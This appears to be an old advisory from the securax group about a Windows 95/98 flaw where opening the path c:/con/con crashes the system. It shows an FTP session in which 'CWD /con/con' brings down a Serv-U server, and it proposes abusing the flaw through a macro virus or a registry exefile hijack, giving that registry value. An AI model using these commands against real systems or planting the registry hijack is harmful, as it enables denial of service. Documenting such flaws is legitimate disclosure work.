New exploit found by the securax crew on 3/3/error

for: windoze 98 maybe 95 too...
not for NT4 or win2K

When we looked at the new exploit for ie that uses the image c:/con/con 
(http://www.zoomnet.net/~quick/error/crash.html)

we experimented a bit with that unexisting path.
We found that any program in windows 98 will crash if you try to open that file.
eg: try Start --> run --> c:/con/con
or open in Word the non-existing document c:/con/con
both attempts will result in en Blues Screen of death and a lockup.


This can also be exploited to crash remote servers
Look what we tryed on this servU-FTP v 2.4a
(works on any windoze 98 FTP even with anonyous or guest account)

it looked something like this:

230 user logged in, proceed
SYST
215 UNIX TYPE:L8
connect ok!
PWD
257 "c:/home" is current directory.
haal directory op
TYPE A
200 Type set to A.
PORT xx.xx.xx.xx :-)
200 PORT Command succesful
LIST
150 Opening ASCII mode data connect
Download: 86 bytes
Wacht op de server
226 transfer complete
CDUP
250 directory changed to /c:/
PWD
250 "/c:/" is current directory
CWD /con/con        --> this does the trick

... 
no more response :-)  server crashed.


This is probably just the beginning of a new series of exploits for windoze.
this little flaw could easily be used in a macro virus. maybe even be placed in the registry

HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open
c:\con\con "%1" %*


Da G#Df@RTER & Pathos (securax) 

www.securax.org